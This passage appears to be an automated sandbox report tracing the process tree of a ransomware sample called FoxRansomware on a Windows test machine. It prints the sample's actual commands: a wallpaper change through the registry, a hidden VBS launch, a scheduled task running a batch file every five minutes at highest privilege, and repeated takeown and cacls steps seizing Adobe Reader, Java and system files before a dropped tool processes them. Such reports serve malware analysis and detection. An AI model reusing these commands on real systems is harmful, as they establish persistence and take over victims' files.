- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\5iAjrOSD.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:1976
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:1100
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:2520
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\mM4C0Yfc.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\mM4C0Yfc.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\OfP7QNh1.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\OfP7QNh1.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:2932
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:3940
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:4712
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵PID:1564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1172 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1540 -
C:\Users\Admin\AppData\Local\Temp\NDS5iFeg64.exeNDS5iFeg.exe -accepteula "AdobeID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:5400
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:5212 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:5492
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵PID:5516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:5540 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:5544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
PID:5664 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:5684
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵PID:5560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:5716 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
PID:6896
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
PID:5908 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:5948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵PID:6932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:7100 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:5976
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:7128 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:2180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵PID:6100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:6068 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:6108
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:2660 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:6128
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵
- Modifies file permissions
PID:6096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:7116 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:5992
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:2464 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:6056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵PID:6048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:7164 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2676
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:6252 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:6272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:6304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:6324 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:6312
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6356
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵
- Loads dropped DLL
PID:6344 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:6460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵PID:6472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "adobepdf.xdc" -nobanner3⤵
- Loads dropped DLL
PID:6476 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "adobepdf.xdc" -nobanner4⤵
- Executes dropped EXE
PID:6484
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵
- Loads dropped DLL
PID:6540 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:6584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵
- Modifies file permissions
PID:6596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "distribute_form.gif" -nobanner3⤵
- Loads dropped DLL
PID:6652 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "distribute_form.gif" -nobanner4⤵
- Executes dropped EXE
PID:6644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵
- Loads dropped DLL
PID:6604 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:6712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵PID:2012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "main.css" -nobanner3⤵
- Loads dropped DLL
PID:6728 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "main.css" -nobanner4⤵
- Executes dropped EXE
PID:6740
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵
- Loads dropped DLL
PID:6800 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:6620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵
- Modifies file permissions
PID:6828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "review_shared.gif" -nobanner3⤵
- Loads dropped DLL
PID:6836 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "review_shared.gif" -nobanner4⤵
- Executes dropped EXE
PID:6812
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵
- Loads dropped DLL
PID:2096 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:2388
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵
- Loads dropped DLL
PID:784 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵
- Executes dropped EXE
PID:1820
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵
- Loads dropped DLL
PID:1876 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:2380
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵PID:2632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵
- Loads dropped DLL
PID:1612 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵
- Executes dropped EXE
PID:808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵
- Loads dropped DLL
PID:1476 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:2720
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵PID:2728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵
- Loads dropped DLL
PID:2400 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵
- Executes dropped EXE
PID:652
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:448
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵
- Loads dropped DLL
PID:2480 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:2032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵
- Loads dropped DLL
PID:1464 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵
- Executes dropped EXE
PID:1912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵
- Loads dropped DLL
PID:1448 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:2296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵PID:580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "can03.ths" -nobanner3⤵
- Loads dropped DLL
PID:2868 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "can03.ths" -nobanner4⤵
- Executes dropped EXE
PID:2264
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵
- Loads dropped DLL
PID:2360 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:2928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵PID:2324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵
- Loads dropped DLL
PID:1468 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵
- Executes dropped EXE
PID:1560
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵
- Loads dropped DLL
PID:2104 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:1812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵PID:2976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ROMAN.TXT" -nobanner3⤵
- Loads dropped DLL
PID:2300 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "ROMAN.TXT" -nobanner4⤵
- Executes dropped EXE
PID:2780
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2372
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵
- Loads dropped DLL
PID:1028 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:1500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵
- Modifies file permissions
PID:2696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CP1257.TXT" -nobanner3⤵
- Loads dropped DLL
PID:1908 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CP1257.TXT" -nobanner4⤵
- Executes dropped EXE
PID:472
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵
- Loads dropped DLL
PID:1940 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:2244
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "superbar.png" -nobanner3⤵
- Loads dropped DLL
PID:668 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "superbar.png" -nobanner4⤵
- Executes dropped EXE
PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵
- Loads dropped DLL
PID:1596 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:1656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:320 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:2392
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2292
-
-
-
